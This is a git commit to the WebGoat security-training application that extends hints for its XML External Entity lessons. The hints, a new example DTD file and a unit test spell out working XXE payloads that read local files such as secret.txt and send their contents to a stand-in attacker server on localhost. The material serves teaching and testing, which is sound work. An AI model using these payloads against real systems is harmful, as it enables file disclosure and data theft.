Extended and fixed some lessons

This commit is contained in:
Nanne Baars
2018-05-27 20:37:44 +02:00
parent d2b6725f3b
commit 1edceb0aa8
16 changed files with 152 additions and 168 deletions

View File

@ -4,6 +4,7 @@ import com.google.common.base.Charsets;
import com.google.common.io.Files;
import lombok.SneakyThrows;
import org.owasp.webgoat.assignments.AssignmentEndpoint;
import org.owasp.webgoat.assignments.AssignmentHints;
import org.owasp.webgoat.assignments.AssignmentPath;
import org.owasp.webgoat.assignments.AttackResult;
import org.springframework.beans.factory.annotation.Autowired;
@ -49,6 +50,7 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
* @since November 18, 2016
*/
@AssignmentPath("xxe/blind")
@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
public class BlindSendFileAssignment extends AssignmentEndpoint {
static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";

View File

@ -51,7 +51,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
* @since 4/8/17.
*/
@AssignmentPath("xxe/simple")
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
public class SimpleXXE extends AssignmentEndpoint {
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};

View File

@ -30,9 +30,17 @@ xxe.content.output=Welcome {0} you can now login to our website
xxe.blind.output=Contents of the file is: {0}
xxe.hints.simple.xxe.1=Try submitting the form and see what happens
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
xxe.hints.simple.xxe.3=Try to include your own DTD
xxe.hints.simple.xxe.4=Try to include a doctype "(<!DOCTYPE...)" in the xml
xxe.hints.simple.xxe.2=Use ZAP/Burp to intercept the request and try to include your own DTD
xxe.hints.simple.xxe.3=Try to include a doctype "(<!DOCTYPE...)" in the xml
xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
xxe.hints.simple.xxe.5=Do not forget to reference the entity
xxe.hints.simple.xxe.6=In the comment you should references: <comment><text>&root;test</text></comment>
xxe.hints.content.type.xxe.1=Take a look at the content type
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>

View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>">
%all;
~

View File

@ -3,5 +3,5 @@
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
So this might result in JSON endpoints being vulnerable to XXE attacks.
Again same exercise but try to perform the same XML injection as we did in first assigment.
Again same exercise but try to perform the same XML injection as we did in first assignment.

View File

@ -71,6 +71,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
@Test
public void solve() throws Exception {
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
//Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
@ -80,6 +81,8 @@ public class BlindSendFileAssignmentTest extends LessonTest {
.withStatus(200)
.withBody(dtd)));
webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
//Make the request from WebGoat
String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" +
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +